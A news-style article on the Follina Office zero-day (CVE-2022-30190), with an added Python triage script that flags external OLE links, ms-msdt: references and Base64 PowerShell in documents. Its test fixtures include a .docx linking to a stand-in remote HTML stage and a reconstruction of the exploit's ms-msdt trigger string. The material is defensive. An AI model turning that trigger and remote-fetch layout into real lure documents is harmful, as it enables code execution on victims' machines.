New Microsoft Office Zero-Day ‘Follina’ Exploited in Remote Code Execution Attacks


Security researchers recently discovered a new Microsoft Office zero-day flaw being exploited in remote code execution attacks that deliver PowerShell payloads. The vulnerability, tracked as CVE-2022-30190, lets an attacker run arbitrary PowerShell commands by having an Office document invoke the Microsoft Support Diagnostic Tool (MSDT) through its ms-msdt: URL protocol handler.

Researchers believe the flaw, dubbed “Follina,” has been around for a while, as they traced it back to a report submitted to Microsoft on April 12. The attack chain abuses legitimate Office functionality: the document references an external resource, Word fetches an HTML file from the attacker’s server, and a script in that HTML invokes MSDT via the ms-msdt: URL protocol, which then runs attacker-supplied code on the victim’s device.

To make matters worse, Follina does not require elevated privileges (the payload runs with the rights of the user who opened the document), was not detected by Microsoft Defender at the time of discovery, and does not rely on macros, so the usual macro warning never appears before scripts or binaries are executed. The flaw was discovered by accident last Friday when security researcher nao_sec stumbled upon a malicious Word document submitted to a virus scanning platform.

The researcher posted a screenshot of some obfuscated code used by the malicious file, which security researcher Kevin Beaumont deobfuscated. Beaumont said the code builds a command-line string that Microsoft Word hands to MSDT through the ms-msdt: URL handler, which is why it executes even when macros are disabled.

The decoded PowerShell script searches a RAR archive on the victim’s device for a Base64-encoded file, decodes it and executes it. However, what that second-stage payload actually did remains unclear, as the extracted file is no longer available.
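The two-stage chain described above (an external OLE relationship in the document pointing at remote HTML, and a Base64 blob hidden in that HTML’s ms-msdt: invocation) is something a responder can check for without opening the file. The script below is an added example written for this article, not code from the original report, from nao_sec or from Beaumont. It parses the relationship parts of a .docx for external oleObject targets, flags HTML that references the ms-msdt: protocol, collapses the '...'+[char]N+'...' string splicing used to hide the quotes and the :: operator, and decodes whatever is passed to FromBase64String so the PowerShell can be read in the clear. The .docx it builds, the stage.example URL and the Base64 payload are all constructed stand-ins, not indicators from the real sample.

```python
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
           "relationships/oleObject")

# The ms-msdt: URL protocol handler is what CVE-2022-30190 abuses.
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)
# '...'+[char]58+[char]58+'...' splices used to hide :: and double quotes.
CHAR_SPLICE = re.compile(r"'((?:\s*\+\s*\[char\]\d+)+)\s*\+\s*'")
# Base64 argument handed to FromBase64String(...) once the splices are gone.
B64_ARG = re.compile(r"FromBase64String\(\s*[\"']?([A-Za-z0-9+/=]+)", re.IGNORECASE)


def build_docx(ole_target: Optional[str], external: bool = True) -> bytes:
    """Construct a minimal .docx (constructed test input, not a real sample).

    With ole_target set and external=True this mirrors the Follina layout:
    an oleObject relationship whose Target is a remote URL.
    """
    rels = ['<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            f'<Relationships xmlns="{REL_NS}">']
    if ole_target is not None:
        mode = ' TargetMode="External"' if external else ""
        rels.append(f'<Relationship Id="rId9" Type="{OLE_REL}" '
                    f'Target="{ole_target}"{mode}/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()


def external_ole_targets(docx: bytes) -> List[str]:
    """Return every external oleObject Target found in the document's .rels parts."""
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append(rel.get("Target", ""))
    return hits


def references_msdt(html: str) -> bool:
    """True when the fetched HTML tries to hand a URL to the MSDT protocol handler."""
    return MSDT_URI.search(html) is not None


def unfold_char_concat(script: str) -> str:
    """Rejoin strings split with +[char]N+ so the hidden characters reappear."""
    def join(m: re.Match) -> str:
        return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", m.group(1)))
    return CHAR_SPLICE.sub(join, script)


def extract_powershell(html: str) -> List[str]:
    """Decode every Base64 blob passed to FromBase64String in the page's script."""
    decoded: List[str] = []
    for blob in B64_ARG.findall(unfold_char_concat(html)):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64 text; leave it for manual review
    return decoded


# Constructed HTML in the obfuscation style Beaumont deobfuscated; the payload
# is a harmless stand-in, NOT the script from the wild sample.
SAMPLE_B64 = base64.b64encode(b"Write-Output 'constructed harmless stand-in'").decode()
SAMPLE_HTML = (
    "<html><body><script>\n"
    "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param "
    "\\\"IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
    "'[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'"
    "+[char]58+[char]58+'FromBase64String('+[char]34+'" + SAMPLE_B64 +
    "'+[char]34+'))'))))\\\"\";\n"
    "</script></body></html>\n"
)

if __name__ == "__main__":
    suspicious = build_docx("http://stage.example/payload.html!")  # constructed URL
    print("external OLE targets:", external_ole_targets(suspicious))
    print("HTML references ms-msdt:", references_msdt(SAMPLE_HTML))
    print("decoded PowerShell:", extract_powershell(SAMPLE_HTML))
```

An external oleObject target is not proof of malice on its own (legitimate linked objects exist), so the relationship check is a triage signal; the ms-msdt: reference in the fetched HTML is the part that ties a document to this specific vulnerability.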

For documents downloaded from the internet, Microsoft Office’s Protected View opens the file read-only and warns the user that it may be unsafe, so the exploit only fires once the user clicks through that warning. However, Beaumont believes that converting the document to a Rich Text Format (RTF) file could allow attackers to bypass this warning and even run the obfuscated code “without even opening the document (via the preview tab in Explorer).”

Yesterday Microsoft published a brief guide to workarounds and recommendations to help customers mitigate the newly discovered vulnerability. Currently, disabling the MSDT URL protocol, by backing up and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key, seems to be the safest option; Microsoft also advises Defender for Endpoint customers to enable the attack surface reduction rule that blocks Office applications from creating child processes. Disabling the protocol handler means troubleshooters can no longer be launched from links, so the key should be restored from the backup once a patch is applied.